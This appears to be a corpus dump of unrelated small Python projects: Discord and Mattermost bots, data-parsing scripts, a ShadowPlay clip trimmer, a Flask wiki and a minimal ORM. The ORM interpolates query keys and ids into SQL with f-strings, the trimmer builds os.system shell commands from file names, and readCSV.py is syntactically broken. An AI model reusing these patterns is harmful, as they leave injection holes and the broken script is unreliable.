for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
``` |
{
"source": "1VORK/idat",
"score": 2
} |
#### File: 1VORK/idat/idat.py
```python
import discord
from discord.utils import get
client=discord.Client(intents=discord.Intents.all())
@client.event
async def on_message(m):
if m.author.id == 159985870458322944 and m.channel.id == 617560772368924673 and len(m.content) > 15:
mem = m.mentions[0]
lvl = int(m.content.split()[18])
if lvl > 99:
await mem.add_roles(get(m.guild.roles, id=0)) #ant
elif lvl > 89:
await mem.add_roles(get(m.guild.roles, id=772193415802388500)) #outside
elif lvl > 79:
await mem.add_roles(get(m.guild.roles, id=772192532401750017)) #spoon
elif lvl > 69:
await mem.add_roles(get(m.guild.roles, id=609437506714206215)) #crocs
elif lvl > 59:
await mem.add_roles(get(m.guild.roles, id=617923744811319317)) #crayf
elif lvl > 49:
await mem.add_roles(get(m.guild.roles, id=617923740117762088)) #manc
elif lvl > 39:
await mem.add_roles(get(m.guild.roles, id=609459315916406847)) #bee
elif lvl > 29:
await mem.add_roles(get(m.guild.roles, id=617923748737187858)) #crab
elif lvl > 19:
await mem.add_roles(get(m.guild.roles, id=531217764145430528)) #hyd
elif lvl > 9:
await mem.add_roles(get(m.guild.roles, id=617654956845170701)) #mag
elif lvl > 4:
await mem.add_roles(get(m.guild.roles, id=531214594480406548)) #frog
client.run(open('tokens/idat','r').read())
``` |
{
"source": "1wheel/learning",
"score": 3
} |
#### File: stacktest/0/readCSV.py
```python
import csv
from datetime import datetime
from dateutil.relativedelta import relativedelta
#loads csv file,
def parseCSV(fileName):
with open(fileName, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
columnTitles = reader.next()
data = []
for r in reader:
nextRow = {}
for i in range(0,len(columnTitles)):
varName = str(columnTitles[i])
nextRow[varName] = r[i]
data.append(nextRow)
print 'read ' + fileName
return data
emmiArray = parseCSV('AllClients_ResearchData.csv')
emmiDateFields = {'DATE_ISSUED': 'eIssued', 'eStarted_DT': 'eStarted'}
keyFields = ['ORGANIZATION_NM', 'FIRST_NM', 'LAST_NM', 'DOB']
invalidStartDate = datetime.strptime('5/7/4013', "%m/%d/%Y")
emmiObject = {}
for row in emmiArray:
if row['FIRST_NM'] != 'UNKNOWN':
row['eIssued'] = datetime.strptime(row['DATE_ISSUED'], "%m/%d/%Y")
row['eViewBy'] = datetime.strptime(row['VIEW_BY_DT'], "%m/%d/%Y") + relativedelta(days=3, months=1)
try:
row['eStarted'] = datetime.strptime(row['DATE_STARTED'], "%m/%d/%Y")
except Exception:
row['eStarted'] = invalidStartDate
key = ''
for field in keyFields:
key = key + row[field]
if key not in emmiObject:
emmiObject[key] = []
emmiObject[key].append(row)
pArray = []
for key in emmiObject:
pArray.append(emmiObject[key])
#hist(map(lambda d: len(d), filter(lambda d: len(d) < 15, pArray)), bins=14)
unoStartDate = datetime.strptime('6/23/2013', "%m/%d/%Y")
gridSize = 10
preUno = []
postUno = []
for i in range(gridSize):
nextPreRow = []
nextPostRow = []
for j in range(gridSize):
nextPreRow.append(0)
nextPostRow.append(0)
preUno.append(nextPreRow)
postUno.append(nextPostRow)
excludedSizeStarts = 0
excludedDateStarts = 0
viewable = 0
viewed = 0
for accessCode in patientRecord
if accessCode['eStarted'] >= viewingDay
and accessCode['eViewBy'] >= viewingDay
and accessCode['eIssued'] <= viewingDay:
viewable = viewable + 1
if accessCode['eStarted'] == viewingDay:
viewed = viewed + 1
for p in pArray:
viewDays = set(map(lambda d: d['eStarted'], p)).difference(set([invalidviewDay]))
for viewDay in viewDays:
viewable = 0
viewed = 0
for accessCode in patientRecord
if accessCode['eStarted'] >= viewDay
and accessCode['eViewBy'] >= viewDay
and accessCode['eIssued'] <= viewDay:
viewable = viewable + 1
if accessCode['eStarted'] == viewDay:
viewed = viewed + 1
if viewable < viewed:
excludedDateStarts = excludedDateStarts + viewed
elif gridSize <= viewable:
excludedSizeStarts = excludedSizeStarts + viewed
else:
if viewDay < unoStartDate:
preUno[viewable][viewed] = preUno[viewable][viewed] + 1
else:
postUno[viewable][viewed] = postUno[viewable][viewed] + 1
``` |
{
"source": "1wheel/whitehouse-petitions",
"score": 3
} |
#### File: 1wheel/whitehouse-petitions/formatUS.py
```python
import json
f = open('US.txt')
lines = f.readlines()
countyArray = []
for l in lines:
l = l.split('\t')
countyArray.append({'name': l[2], 'state': l[4], 'countyName': l[5], 'countyCode': l[6]})
f = open('population.txt')
countyPop = {}
lines = f.readlines()
for l in lines:
l = l.split(',')
countyPop[l[0]] = l[1]
stateCodes = {
'WA': '53', 'DE': '10', 'DC': '11', 'WI': '55', 'WV': '54', 'HI': '15',
'FL': '12', 'WY': '56', 'PR': '72', 'NJ': '34', 'NM': '35', 'TX': '48',
'LA': '22', 'NC': '37', 'ND': '38', 'NE': '31', 'TN': '47', 'NY': '36',
'PA': '42', 'AK': '02', 'NV': '32', 'NH': '33', 'VA': '51', 'CO': '08',
'CA': '06', 'AL': '01', 'AR': '05', 'VT': '50', 'IL': '17', 'GA': '13',
'IN': '18', 'IA': '19', 'MA': '25', 'AZ': '04', 'ID': '16', 'CT': '09',
'ME': '23', 'MD': '24', 'OK': '40', 'OH': '39', 'UT': '49', 'MO': '29',
'MN': '27', 'MI': '26', 'RI': '44', 'KS': '20', 'MT': '30', 'MS': '28',
'SC': '45', 'KY': '21', 'OR': '41', 'SD': '46'
}
cityByState = {}
countyCodes = {}
for state in stateCodes:
cityByState[state] = {}
for city in countyArray:
try:
countyCode = stateCodes[city['state']] + city['countyCode']
if city['countyCode'] != '':
countyCodes[countyCode] = city['countyName']
if city['name'] in cityByState[city['state']]:
if not countyCode in cityByState[city['state']][city['name']]:
cityByState[city['state']][city['name']].append(countyCode)
else:
cityByState[city['state']][city['name']] = [countyCode]
#city doesn't have a country code
except Exception:
nothing = 0
def findCountyCode(city, state):
try:
return cityByState[state][city][0]
except Exception:
#print city + ", " + state
return -1
f = open('2008PresByCounty.csv')
countyPres = {}
lines = f.readlines()
for l in lines:
l = l.replace('\"','').split(',')
try:
countyPres[l[0]] = float(l[1])/(float(l[1])+float(l[2]))
except Exception:
print l
json.dump(countyPop, open('countyPop.json', 'wb'))
#data = json.load(open(filename))
``` |
{
"source": "1WHISKY/shadowplay-multilenght-clips",
"score": 2
} |
#### File: 1WHISKY/shadowplay-multilenght-clips/shadowplay_hotkeys.py
```python
from pynput import keyboard
import os
import time
import glob
import subprocess
import json
import threading
videos_path = os.environ["USERPROFILE"] + "\\Videos\\" #Adjust to whereever you store your videos
videos_path = videos_path.replace("C:\\","D:\\") #I have mine on the D drive
log_path = "hotkeys_log.txt"
kb = keyboard.Controller()
log_ffmpeg = True
def log(text):
with open(log_path, "a") as file:
file.write(text + "\n")
def save_highlight(dur = 90):
try:
for filename in glob.iglob(videos_path + '**/*.mp4', recursive=True):
if ((time.time() - os.stat(filename).st_ctime) / 60) > 1:
continue
#https://stackoverflow.com/questions/3844430/how-to-get-the-duration-of-a-video-in-python
result = subprocess.check_output(f'ffprobe -v quiet -show_streams -select_streams v:0 -of json "{filename}"',shell=True).decode()
duration = json.loads(result)['streams'][0]['duration']
if float(duration) < 120: #Dont touch videos which are already shorter than 120s, adjust this if you want longer clips
continue
log("Trimming to " + str(dur) + "s: " + filename)
tempname = filename + "_temp.mp4"
os.system("ffmpeg" + ("" if log_ffmpeg else " -loglevel quiet") + " -hide_banner -sseof -" + str(dur) + " -i \"" + filename + "\" -map 0:v -map 0:a -c copy \"" + tempname + "\" >> \"" + log_path + "\" 2>&1")
log("Deleting original: " + filename)
os.remove(filename)
os.rename(tempname, filename)
log("Trimmed " + filename)
except Exception as e:
log(e)
def save_highlight90():
kb.press(keyboard.Key.f10) #My shortcut to save shadowplay clips is alt+f10 (defualt), so adjust accordingly
kb.release(keyboard.Key.f10) #The user is already holding alt, so no need to press/release it here
log('Hotkey pressed, waiting 40s')
t = threading.Timer(40.0, save_highlight,[90]) #Make sure your drive is fast enough to store the full video in 40s
t.start() #Using time.sleep in a function called by keyboard.GlobalHotKeys causes issues, thats why a new thread will be created
def save_highlight30():
kb.press(keyboard.Key.f10)
kb.release(keyboard.Key.f10)
log('Hotkey pressed, waiting 40s')
t = threading.Timer(40.0, save_highlight,[30])
t.start()
with keyboard.GlobalHotKeys({
'<alt>+<f11>': save_highlight90, #These shortcuts are used by shadowplay by default for something, so make sure to unbind those in the settings
'<alt>+<f12>': save_highlight30}) as h:
h.join()
``` |
{
"source": "1wickes/wickes-tools",
"score": 4
} |
#### File: wickes_tools/cal1/cal2.py
```python
class cal:
def __init__(self, num1, num2):
self.num1 = num1
self.num2 = num2
def add_numbers(self):
return self.num1 + self.num2
@staticmethod
def subtract_numbers(num1, num2):
return num1 - num2
@staticmethod
def multiply_numbers(num1, num2):
return num1 * num2
@staticmethod
def divide_numbers(num1, num2):
return num1 / num2
def main():
print("calculator module")
if __name__ == "__main__":
main()
```
#### File: wickes_tools/cal4/cal5.py
```python
def main():
print('main function from cal3.py module in package calculator2')
if __name__ == '__main__':
print('this is cal3.py')
``` |
{
"source": "1wilkens/mattermost-exercises",
"score": 3
} |
#### File: mattermost-exercises/movement_bot/subscription_bot.py
```python
import asyncio
import itertools
import json
import re
import threading
from mattermostdriver import Driver
class SubscriptionBot:
""" A mattermost bot implementing a publish/subscribe mechanism. """
SUBSCRIBED_MESSAGE = "Hi there - thx for joining!"
UNSUBSCRIBED_MESSAGE = "Bye then, couch potato!"
NOT_SUBSCRIBED_MESSAGE = "Are you also trying to cancel your gym membership before even registering?"
UNKNOWN_COMMAND_TEXT = "I don't get it, want to join? Try 'subscribe' instead. 'help' may also be your friend."
HELP_TEXT = """
|Command|Description|
|:------|:----------|
|subscribe|Join the growing list of subscribers now!|
|unsubscribe|Go back to your boring office-chair-only life.|
|help|I'm quite sure, you know what this one does.|
"""
def __init__(self, username, password, scheme='https', debug=False):
self.subscriptions = set()
self.username = username
self.debug = debug
self.driver = Driver({
'url': "192.168.122.254",
'login_id': username,
'password': password,
'scheme': scheme,
'debug': debug,
})
self.driver.login()
# get userid for username since it is not automatically set to driver.client.userid ... for reasons
res = self.driver.users.get_user_by_username('bot')
self.userid = res['id']
def start_listening(self):
worker = threading.Thread(target=SubscriptionBot._start_listening_in_thread, args=(self,))
worker.daemon = True
worker.start()
print("Initialized bot.")
def _start_listening_in_thread(self):
# Setting event loop for thread
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
self.driver.init_websocket(self.websocket_handler)
@asyncio.coroutine
def websocket_handler(self, event_json):
event = json.loads(event_json)
if self.debug:
print("websocket_handler:" + json.dumps(event, indent=4))
if 'event' in event and event['event'] == 'posted':
# mentions is automatically set in direct messages
mentions = json.loads(event['data']['mentions']) if 'mentions' in event['data'] else []
post = json.loads(event['data']['post'])
post_id = post['id']
message = post['message']
channel_id = post['channel_id']
sender_id = post['user_id']
if self.userid in mentions:
self.handle_bot_message(channel_id, post_id, sender_id, message)
def handle_bot_message(self, channel_id, post_id, sender_id, message):
if re.match(r'(@' + self.username + ')?\s*help\s*', message):
self._show_help(channel_id, post_id)
elif re.match(r'(@' + self.username + ')?\s*subscribe\s*', message):
self._handle_subscription(sender_id, channel_id, post_id)
elif re.match(r'(@' + self.username + ')?\s*unsubscribe\s*', message):
self._handle_unsubscription(channel_id, post_id, sender_id)
else:
self._handle_unknown_command(channel_id, post_id)
def _show_help(self, channel_id, post_id):
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.HELP_TEXT,
'root_id': post_id,
})
def _handle_subscription(self, sender_id, channel_id, post_id):
self.subscriptions.add(sender_id)
if self.debug:
print(sender_id + " subscribed.")
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.SUBSCRIBED_MESSAGE,
'root_id': post_id,
})
def _handle_unsubscription(self, channel_id, post_id, sender_id):
if sender_id in self.subscriptions:
self.subscriptions.discard(sender_id)
if self.debug:
print(sender_id + " unsubscribed.")
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.UNSUBSCRIBED_MESSAGE,
'root_id': post_id,
})
else:
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.UNSUBSCRIBED_MESSAGE,
'root_id': post_id,
})
def _handle_unknown_command(self, channel_id, post_id):
self.driver.posts.create_post({
'channel_id': channel_id,
'message': self.UNKNOWN_COMMAND_TEXT,
'root_id': post_id,
})
def send_messages_to_subscribers(self, message):
for subscriber in self.subscriptions:
self._send_direct_message(subscriber, message)
def _send_direct_message(self, user_id, message, root_id=None):
res = self.driver.channels.create_direct_message_channel([self.userid, user_id])
channel_id = res['id']
post_options = {
'channel_id': channel_id,
'message': message,
}
if root_id:
post_options['root_id'] = root_id
self.driver.posts.create_post(post_options)
``` |
{
"source": "1xch/fliki",
"score": 2
} |
#### File: fliki/flask_fliki/fliki.py
```python
from werkzeug.local import LocalProxy
from .wiki import Wiki
from .views import create_blueprint
from .util import get_config, url_for_wiki, _wiki
_default_config = {
'BLUEPRINT_NAME': 'wiki',
'URL_PREFIX': '/wiki',
'SUBDOMAIN': None,
'FLASH_MESSAGES': True,
'EDITABLE': True,
'SECURABLE': True,
'MARKUP_PROCESSOR': None,
'CONTENT_DIR': 'fliki-content',
'DISPLAY_VIEW': 'wiki/display.html',
'EDIT_VIEW': 'wiki/edit.html'
}
_default_messages = {
'MOVE_PAGE_SUCCESS': ('{old_page} was moved to {new_page}', 'success'),
'MOVE_PAGE_FAIL': ('Unable to move {old_page}', 'error'),
'EDIT_PAGE_SUCCESS': ('{page} successfully edited', 'success'),
'EDIT_PAGE_FAIL': ('Unable to edit {page}', 'error'),
'DELETE_PAGE_SUCCESS': ('{page} sucessfully deleted', 'success'),
'DELETE_PAGE_FAIL': ('Unable to delete {page}', 'error'),
}
def _context_processor(wiki):
ctx_prcs = {}
ctx_prcs.update({'url_for_wiki': url_for_wiki, 'wiki': wiki})
return ctx_prcs
def _get_wiki(app, datastore, **kwargs):
for key, value in get_config(app).items():
kwargs[key.lower()] = value
kwargs.update(dict(app=app, datastore=datastore))
wiki = Wiki(**kwargs)
return wiki
class Fliki(object):
def __init__(self, app=None, datastore=None, **kwargs):
self.app = app
self.datastore = datastore
if self.app is not None and self.datastore is not None:
self._wiki = self.init_app(self.app, self.datastore, **kwargs)
def init_app(self, app, datastore, register_blueprint=True, **kwargs):
for key, value in _default_config.items():
app.config.setdefault('WIKI_' + key, value)
for key, value in _default_messages.items():
app.config.setdefault('WIKI_MSG_' + key, value)
wiki = _get_wiki(app, datastore, **kwargs)
if register_blueprint:
app.register_blueprint(create_blueprint(wiki, __name__))
app.extensions['fliki'] = wiki
self.register_context_processors(app, _context_processor(wiki))
return wiki
def register_context_processors(self, app, context_processors):
app.jinja_env.globals.update(context_processors)
def __getattr__(self, name):
return getattr(self._wiki, name, None)
```
#### File: fliki/flask_fliki/forms.py
```python
from flask.ext.wtf import Form
from wtforms import (HiddenField, TextField, TextAreaField, SubmitField)
from .util import clean_url
class WikiForm(Form):
def __init__(self, **kwargs):
super(WikiForm, self).__init__(**kwargs)
class EditorForm(WikiForm):
pagekey = HiddenField('')
edit_content = TextAreaField('')
submit = SubmitField('create or save page')
def __init__(self, **kwargs):
super(EditorForm, self).__init__(**kwargs)
self.key = clean_url(kwargs.get('url', None))
self.pagekey.data = self.key
class MoveForm(WikiForm):
oldkey = HiddenField('')
newkey = TextField('')
submit = SubmitField('move page')
def __init__(self, **kwargs):
super(MoveForm, self).__init__(**kwargs)
self.oldkey.data = kwargs.get('old', None)
self.newkey.data = kwargs.get('new', None)
class DeleteForm(WikiForm):
delete = HiddenField('')
submit = SubmitField('delete page')
def __init__(self, **kwargs):
super(DeleteForm, self).__init__(**kwargs)
self.delete.data = kwargs.get('delete', None)
```
#### File: fliki/flask_fliki/views.py
```python
from flask import (current_app, redirect, request, render_template,
Blueprint, url_for)
from .util import config_value, _wiki, flash_next
from .forms import EditorForm, MoveForm, DeleteForm
def index():
page = _wiki.get('index')
return render_template(_wiki.display_view, page=page)
def display(url):
page = _wiki.get(url)
if page:
return render_template(_wiki.display_view, page=page)
return redirect(url_for('.wiki_edit', url=url))
def preview(url):
page = _wiki.get(url)
if page:
return page.html
def edit(url):
page = _wiki.get(url)
if page:
first = False
forms = {'edit_form': EditorForm(url=url, edit_content=page.raw),
'move_form': MoveForm(old=url),
'delete_form': DeleteForm(delete=url)}
else:
first=True
forms={'edit_form': EditorForm(url=url)}
return render_template(_wiki.edit_view, first=first, forms=forms, page=page)
def save():
r = request.form
form = EditorForm(url=r['pagekey'], edit_content=r['edit_content'])
page = form.pagekey.data
if form.validate_on_submit():
if _wiki.put(page, form.edit_content.data):
flash_next('EDIT_PAGE_SUCCESS', page=page)
else:
flash_next('EDIT_PAGE_FAIL', page=page)
return redirect(url_for('.wiki_display', url=page))
def move():
r = request.form
form = MoveForm(old=r['oldkey'], new=r['newkey'])
old = form.oldkey.data
new = form.newkey.data
if form.validate_on_submit():
if _wiki.move(old, new):
flash_next('MOVE_PAGE_SUCCESS', old_page=old, new_page=new)
return redirect(url_for('.wiki_display', url=new))
flash_next('MOVE_PAGE_FAIL', old_page=old)
return redirect(url_for('.wiki_display', url=old))
def delete():
r = request.form
form = DeleteForm(delete=r['delete'])
page = form.delete.data
if form.validate_on_submit():
if _wiki.delete(page):
url='index'
flash_next('DELETE_PAGE_SUCCESS', page=page)
else:
url = form.delete.data
flash_next('DELETE_PAGE_FAIL', page=page)
return redirect(url_for('.wiki_display', url=url))
def create_blueprint(wiki, import_name):
bp = Blueprint(wiki.blueprint_name,
import_name,
url_prefix=wiki.url_prefix,
subdomain=wiki.subdomain,
template_folder='templates')
bp.route('/',
endpoint='wiki_index',
methods=['GET'])(index)
bp.route('/<path:url>/',
endpoint='wiki_display',
methods=['GET'])(display)
if wiki.editable:
bp.route('/<path:url>/preview',
endpoint='wiki_preview',
methods=['GET'])(preview)
bp.route('/<path:url>/edit',
endpoint='wiki_edit',
methods=['GET'])(edit)
bp.route('/move',
endpoint='wiki_move',
methods=['POST'])(move)
bp.route('/save',
endpoint='wiki_save',
methods=['POST'])(save)
bp.route('/delete',
endpoint='wiki_delete',
methods=['POST'])(delete)
return bp
```
#### File: fliki/tests/conftest.py
```python
import pytest
from flask import Flask
from flask.ext.fliki import Fliki
import datastore.filesystem
import shutil
def remove_data():
shutil.rmtree('/tmp/fliki-content')
@pytest.fixture
def app(request):
app = Flask(__name__)
app.config['TESTING'] = True
app.config['WTF_CSRF_ENABLED'] = False
app.config['SECRET_KEY'] = 'secret_key'
app.config['WIKI_URL_PREFIX'] = '/test'
Fliki(app, datastore=datastore.filesystem.FileSystemDatastore('/tmp/fliki-content'))
app.extensions['fliki'].put('random_page', "A random page")
request.addfinalizer(remove_data)
return app
@pytest.fixture
def client(app):
return app.test_client()
``` |
{
"source": "1x-eng/ext-a-cy",
"score": 3
} |
#### File: ext-a-cy/core/scraper.py
```python
from bs4 import BeautifulSoup
import os
import requests
__author__='<NAME>'
# 30 June 2019.
# <EMAIL>
# Scrape contents of a loaded webpage into a text file and store into a text file within sink.
class ScrapePage:
def __init__(self, page_source, sink_file_name):
super(ScrapePage, self).__init__()
self.page_source = page_source
self.sink_file_name = sink_file_name
@staticmethod
def __scrape_body(page_source):
soup = BeautifulSoup(page_source, features='html.parser')
body = soup.find('body')
the_contents_of_body_without_body_tags = body.findChildren()
return the_contents_of_body_without_body_tags
def __scrape_iframe(self, iframe_id):
try:
session = requests.Session()
soup = BeautifulSoup(self.page_source, features='html.parser')
iframe_src = soup.select_one('#{}'.format(iframe_id)).attrs['src']
iframe_contents = session.get(f"https:{iframe_src}")
iframe_soup = BeautifulSoup(iframe_contents.content, 'html.parser')
return iframe_soup
except Exception as e:
print('Unable to scrape contents of iframe: {}. Stack trace to follow.'.format(iframe_id))
print(str(e))
def extractor(self):
try:
# create a sink if not already existing
os.makedirs('{}/../sink'.format(os.path.dirname(__file__)), exist_ok=True)
# Extract page contents using Soup.
# .txt to visualize differenes.
with open('{}/../sink/{}.txt'.format(os.path.dirname(__file__), self.sink_file_name), "a") as f:
print(self.__scrape_body(self.page_source), file=f)
except Exception as e:
print('Failed to scrape contents into {} file. Stack trace to follow.'.format(self.sink_file_name))
print(str(e))
def iframe_extractor(self, iframe_id):
try:
# create a sink if not already existing
os.makedirs('{}/../sink'.format(os.path.dirname(__file__)), exist_ok=True)
# Extract page contents using Soup.
# .txt to visualize differenes.
with open('{}/../sink/{}.txt'.format(os.path.dirname(__file__), self.sink_file_name), "a") as f:
print(self.__scrape_iframe(iframe_id), file=f)
except Exception as e:
print('Failed to scrape iframe contents into {} file. Stack trace to follow.'.format(self.sink_file_name))
print(str(e))
``` |
{
"source": "1x-eng/PROTON",
"score": 2
} |
#### File: nucleus/generics/parallel_programming.py
```python
from gevent import monkey
monkey.patch_socket()
monkey.patch_ssl()
# ensure monkey patching for gevents to work their charm.
# remember - monkey patching is a necessary evil here.
import gevent
import time
__author__ = "<NAME>, <EMAIL>"
__copyright__ = "Copyright (C) 2018 <NAME> | http://www.apricity.co.in"
__license__ = "BSD 3-Clause License"
__version__ = "1.0"
class Parallel_Programming:
def __init__(self):
super(Parallel_Programming, self).__init__()
def __generate_multiple_threads(self, associated_function, *args):
"""
Parallel Programming is Tricky. Used well, reaps many benefits; if otherwise, it will be a nightmare.
Multiple threading is advised for IO heavy ops (Like making multiple API calls concurrently). If what you want
is not IO heavy but CPU heavy, consider multi processing instead. Multi Threading is not best suited or CPU
intense operations.
:param associated_function: function that the greenlet is supposed to execute.
:param args: Dynamic argument list. Will resolve to a tuple.
:return: a greenlet.
"""
return gevent.spawn(associated_function, *args)
def __execute_multiple_threads(self, greenlets_pool, time_since_pool = None):
"""
:param greenlets_pool: a list of greenlets
:param time_since_pool: time.time() value. This essentially must be the time when pool was generated by
generate_multiple_threads
:return: results in dictionary suggesting time of execution. StartTime, endTime-StartTime
"""
start_time = time.time()
gevent.joinall(greenlets_pool)
end_time = time.time()
results = list(map(lambda g: g.value, greenlets_pool))
return {
'execution_time': end_time - start_time,
'execution_time_since_pool_gen': None if time_since_pool is None else end_time - time_since_pool,
'thread_pool_results': results
}
#########################################################################################################
# Multi Threading Wrapper. [PS: Use Multi Threading only on IO heavy ops; Not CPU intense]
#########################################################################################################
def concurrency_wrapper(self, type, target_function, *args):
"""
Multi-threading functionality available should this MIC stack need it.
self.generate_multiple_threads: Method to generate multiple threads and create a thread pool.
self.execute_multiple_threads: Method to concurrently execute threads in a threadpool.
:param type: Valid Options: 'http', 'non-http',
:param target_function: Target function that threads should execute (This function should be in scope)
:param args: Arguments expected by target function. If type=='http', *args[0] must be a list of URLS.
:return: Results respective to type of operation specified.
"""
from configuration import ProtonConfig
from nucleus.generics.log_utilities import LogUtilities
logger = LogUtilities().get_logger(log_file_name='parallel_programming_logs',
log_file_path='{}/trace/parallel_programming_logs.log'.format(
ProtonConfig.ROOT_DIR))
def __http_calls_resolver(target_function, args):
"""
:param target_function: Target function that threads should execute (This function should be in scope)
:param args:[List] Arguments expected by target function. For HTTP Calls, args[0] = A list of urls to
perform HTTP Operation.
:return:[List] Thread Pool Results
"""
# TODO: Validate input parameters to contain expected; fail gracefully if not.
try:
_args = list(args)
urls = _args[0]
_args.pop(0)
# Step 1: Create number of threads required.
threads_pool = list(map(lambda url: self.__generate_multiple_threads(target_function, url, _args),
urls))
time_after_pool = time.time()
logger.info('[Parallel Programming] - Threads pool created with {} threads to resolve {} '
'method concurrently'.format(len(urls), target_function))
# Step 2: Execute threads concurrently.
thread_pool_results = self.__execute_multiple_threads(threads_pool, time_after_pool)
logger.info(
'[Parallel Programming] - {} threads executed concurrently. Operation was completed in '
'{} seconds and took {} seconds since thread pool was '
'spawned.'.format(len(urls), thread_pool_results['execution_time'],
thread_pool_results['execution_time_since_pool_gen']))
return thread_pool_results
except Exception as e:
logger.exception(
'[Parallel Programming] - Error completing HTTP call resolver. Stack trace to follow')
logger.exception(str(e))
def __non_http_resolver(target_function, args):
"""
:param target_function: Target function that threads should execute (This function should be in scope)
:param args:[List] Arguments expected by target function.
:return:[List] Thread Pool Results.
"""
try:
# Step 1: Create number of threads required.
threads_pool = list(map(lambda arg: self.__generate_multiple_threads(target_function, arg), args))
time_after_pool = time.time()
logger.info('[Parallel Programming] - Threads pool created with {} threads to resolve {} '
'method concurrently'.format(len(args), target_function))
# Step 2: Execute threads concurrently.
thread_pool_results = self.__execute_multiple_threads(threads_pool, time_after_pool)
logger.info(
'[Parallel Programming] - {} threads executed concurrently. Operation was completed in '
'{} seconds and took {} seconds since thread pool was '
'spawned.'.format(len(args), thread_pool_results['execution_time'],
thread_pool_results['execution_time_since_pool_gen']))
return thread_pool_results
except Exception as e:
logger.exception(
'[Parallel Programming] - Error completing Non-HTTP resolver. Stack trace to follow')
logger.exception(str(e))
def __async_resolver(target_function, args):
"""
Use this function when you want non-blocking sequence of execution.
:param target_function: Target function that threads should execute (This function should be in scope)
:param args: [Tuple] Arguments expected by target function.
:return: Void
"""
try:
g = gevent.spawn(target_function, args)
gevent.sleep(0) # This is required to kickstart gevent co-routines since there will be no join.
logger.info('[Parallel Programming] Async resolver {} invoked to execute function - '
'{} and args - {}'.format(g, target_function, args))
except Exception as e:
logger.exception(
'[Parallel Programming] - Error completing async resolver. Stack trace to follow')
logger.exception(str(e))
__map_type = {'http': __http_calls_resolver, 'non-http': __non_http_resolver, 'async': __async_resolver}
return __map_type[type](target_function, args)
```
#### File: test/unit/test_log_utilities.py
```python
from configuration import ProtonConfig
from nucleus.generics.log_utilities import LogUtilities
from unittest import TestCase
__author__ = "<NAME>, <EMAIL>"
__copyright__ = "Copyright (C) 2018 <NAME>"
__license__ = "BSD 3-Clause License"
__version__ = "1.0"
class TestLogUtilities(TestCase):
log_utilities_object = LogUtilities()
def test_log_utilities(self):
assert isinstance(self.log_utilities_object, LogUtilities)
def test_logger(self):
return_logger = self.log_utilities_object.get_logger(log_file_name='test_log_utillities_logs',
log_file_path='{}/trace/test_log_utillities_logs.log'.format(
ProtonConfig.ROOT_DIR))
print(str(return_logger))
assert str(type(return_logger)) == "<class 'logging.Logger'>"
assert str(return_logger) == '<Logger test_log_utillities_logs.base (DEBUG)>'
``` |
{
"source": "1xuan/webgo",
"score": 2
} |
#### File: webgo/demo/demoapp.py
```python
import time
from datetime import datetime
from webgo.handler import get, post
from webgo.template import render
from .model import Exam
@post('/')
def form(request):
name = request.POST['name']
# Create a record
exam = Exam(name=name, time=str(datetime.now()))
# Save it to database
exam.save()
# Select all record in 'Exam' table
all_rec = Exam.objects.query()
return '<br>'.join('LOG: ' + item.name + item.time for item in all_rec)
@get('/')
def static_text(request):
return render(request, 'index.html', context={
'value': 'Login Log',
})
@get('/hello')
def hello(request):
time.sleep(1)
return 'Hello World'
```
#### File: webgo/webgo/config.py
```python
import os
import logging
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s',
)
DB_FILE = 'sqlite.db'
project = None
class ProjectParse:
def __init__(self, project_path):
self._project_path = project_path
@property
def path(self):
return self._project_path
@property
def name(self):
return os.path.basename(self._project_path)
@property
def pkg_name(self):
return self.name + '__main__'
```
#### File: webgo/webgo/orm.py
```python
import sqlite3
import logging
from collections import abc
from webgo.exceptions import FieldError
from webgo.config import DB_FILE
logger = logging.getLogger(__name__)
class MyConnection(sqlite3.Connection):
"""
Customize sql execute class on my behalf
"""
def cursor(self, *args, **kwargs):
return super().cursor(MyCursor)
class MyCursor(sqlite3.Cursor):
def execute(self, *args, **kwargs):
if len(args) == 1:
return super().execute(*args, **kwargs)
sql, values = args
values = tuple(map(lambda x: None if isinstance(x, NewId) else x, values))
return super().execute(sql, values)
class DBConnect:
""" DB connection context manager """
def __init__(self):
self.conn = sqlite3.connect(DB_FILE, factory=MyConnection)
def __enter__(self):
return self.conn
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
self.conn.commit()
elif issubclass(exc_type, sqlite3.Error):
self.conn.rollback()
logger.warning(f'The DB operation error: {exc_val}', exc_info=True)
else:
logger.warning(f'Exception: {exc_val}', exc_info=True)
self.conn.close()
return True
class NewId:
""" pseudo-id for new record """
def __bool__(self):
return False
class ModelMetaclass(type):
def __new__(mcs, name, bases, attrs):
if attrs.get('__abstract__'):
return type.__new__(mcs, name, bases, attrs)
mappings = {}
for k, v in attrs.items():
if isinstance(v, Field):
if k == 'pk':
raise FieldError("Can't define Field named 'pk'")
mappings[k] = v
for k in mappings.keys():
attrs.pop(k)
mappings['pk'] = Field('pk', 'INTEGER PRIMARY KEY AUTOINCREMENT')
attrs['__mappings__'] = mappings
attrs['__table__'] = name
return type.__new__(mcs, name, bases, attrs)
class RecordSet(abc.Set):
""" Create a record set for result of query
Cause of which it inherit abc.Set:
We can perform some operations come from set.
'|', '&', ... and so on
"""
def __init__(self, iterable=None, model=None):
if iterable:
self._set = set(iterable)
self.model = model
def __get__(self, inst, class_):
return self.__class__(model=class_)
def query(self, **kwargs):
""" Return a recordset including all specific records of table """
if len(kwargs) > 1:
raise KeyError('support search by one key word only')
if not kwargs:
kwargs[1] = 1
kw = list(kwargs.keys())[0]
cols = list(self.model.__mappings__.keys())
colstr = ','.join(cols)
with DBConnect() as conn:
rows = conn.execute(f"""
SELECT {colstr} FROM {self.model.__table__}
WHERE {kw}=?
""", (kwargs[kw], )
).fetchall()
return self.__class__(
(self.model(**dict(zip(cols, row))) for row in rows),
self.model
)
def get(self, pk):
""" Return a single record which is a instance of class """
cols = list(self.model.__mappings__.keys())
colstr = ','.join(cols)
with DBConnect() as conn:
row = conn.execute(f"""
SELECT {colstr} FROM {self.model.__table__}
WHERE pk={pk}
""").fetchone()
